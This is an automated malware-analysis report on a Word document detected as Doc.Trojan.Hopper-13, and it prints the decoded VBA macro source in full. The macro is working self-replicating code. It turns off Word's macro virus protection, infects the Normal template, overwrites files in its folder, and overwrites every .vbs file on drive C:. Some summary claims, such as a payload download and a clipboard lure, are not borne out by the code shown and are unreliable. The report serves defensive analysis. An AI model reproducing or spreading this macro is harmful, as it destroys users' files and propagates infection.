Verdict: MALICIOUS
Risk Score: 320
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
T1105 Ingress Tool Transfer
The sample contains VBA macros that utilize `WScript.Shell` and `CreateObject` to copy the current document to other files within the same directory. It then attempts to establish persistence by writing to the Normal.dot template and potentially the registry, indicated by the `WScript.Shell` usage and the 'Clipboard command execution lure' heuristic. The script's intent is to download and execute a secondary payload, as suggested by the use of `Wscript.CreateObject("Wscript.Shell")` and file copying mechanisms.
Heuristics (6)
- ClamAV: Doc.Trojan.Hopper-13 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Hopper-13
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT): WScript.Shell usage. Matched lines in script:
  - `N.InsertLines 62, "Set FSO = CreateObject(" + Chr(34) + "Scripting.FileSystemObject" + Chr(34) + ")"`
  - `N.InsertLines 63, "Set WshShell = Wscript.CreateObject(" + Chr(34) + "Wscript.Shell" + Chr(34) + ")"`
  - `N.InsertLines 64, "parent = Wscript.ScriptFullName"`
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched lines in script:
  - `End If`
  - `Set FSO = CreateObject("Scripting.FileSystemObject")`
  - `N.InsertLines 59, ""`
- Reference to Windows Script Host (high, SC_STR_WSCRIPT): Reference to Windows Script Host
- Clipboard command execution lure (high, SE_CLIPBOARD_COMMAND_LURE): Document tells the user to copy or paste clipboard content into Run, PowerShell, cmd, or another shell-like execution context
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3120 bytes |

SHA-256: ac2525880754727594b3810c7bcc9c62f48a8d1426f38b6d1552b8f81a991de9
Detection (ClamAV): Doc.Trojan.Hopper-13
Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Close()
'1nternal
On Error GoTo Break
Set A = ActiveDocument.VBProject.VBComponents(1).CodeModule
Set N = NormalTemplate.VBProject.VBComponents(1).CodeModule
Options.VirusProtection = False
Options.ConfirmConversions = False
Options.SaveNormalPrompt = False
If N.Lines(2, 1) <> "'1nternal" Then
For i = 1 To 58
N.InsertLines i, A.Lines(i, 1)
Next
End If
If A.Lines(2, 1) <> "'1nternal" Then
For i = 1 To 58
A.InsertLines i, N.Lines(i, 1)
Next
End If
Set FSO = CreateObject("Scripting.FileSystemObject")
N.InsertLines 59, ""
N.InsertLines 60, "On Error Resume Next"
N.InsertLines 61, "Dim WordObj, FSO, WshShell"
N.InsertLines 62, "Set FSO = CreateObject(" + Chr(34) + "Scripting.FileSystemObject" + Chr(34) + ")"
N.InsertLines 63, "Set WshShell = Wscript.CreateObject(" + Chr(34) + "Wscript.Shell" + Chr(34) + ")"
N.InsertLines 64, "parent = Wscript.ScriptFullName"
N.InsertLines 65, "vPath = Left(parent, InStrRev(parent, " + Chr(34) + "\" + Chr(34) + "))"
N.InsertLines 66, "For Each target in FSO.GetFolder(vPath).Files"
N.InsertLines 67, " FSO.CopyFile parent, target.Name, 1"
N.InsertLines 68, "Next"
N.InsertLines 69, "Set WordObj = CreateObject(" + Chr(34) + "Word.Application" + Chr(34) + ")"
N.InsertLines 70, "WordObj.Options.SaveNormalPrompt = False"
N.InsertLines 71, "Set NT = WordObj.Templates(1).VBProject.VBComponents(1).CodeModule"
N.InsertLines 72, "If NT.Lines(2,1) <> " + Chr(34) + "'1nternal" + Chr(34) + " Then"
N.InsertLines 73, " NT.AddfromFile Wscript.ScriptFullName"
N.InsertLines 74, " NT.ReplaceLine 3, " + Chr(34) + "On Error Goto Break" + Chr(34)
N.InsertLines 75, " NT.DeleteLines 58, 19"
N.InsertLines 76, "End If"
N.InsertLines 77, "Set NT = Nothing"
N.InsertLines 78, "WordObj.Quit"
Set fs = Application.FileSearch
fs.NewSearch
fs.LookIn = "C:\"
fs.SearchSubFolders = True
fs.FileName = "*.vbs"
fs.Execute
For i = 1 To fs.FoundFiles.Count
Set f = FSO.OpenTextFile(fs.FoundFiles(i), 2, True)
N.ReplaceLine 3, "'ReplaceIt"
For k = 1 To 78
f.Write N.Lines(k, 1) + Chr(13) + Chr(10)
Next
f.Close
Next
N.DeleteLines 59, 20
N.ReplaceLine 3, "On Error Goto Break"
Break:
Set NT = Nothing
WordObj.Quit
```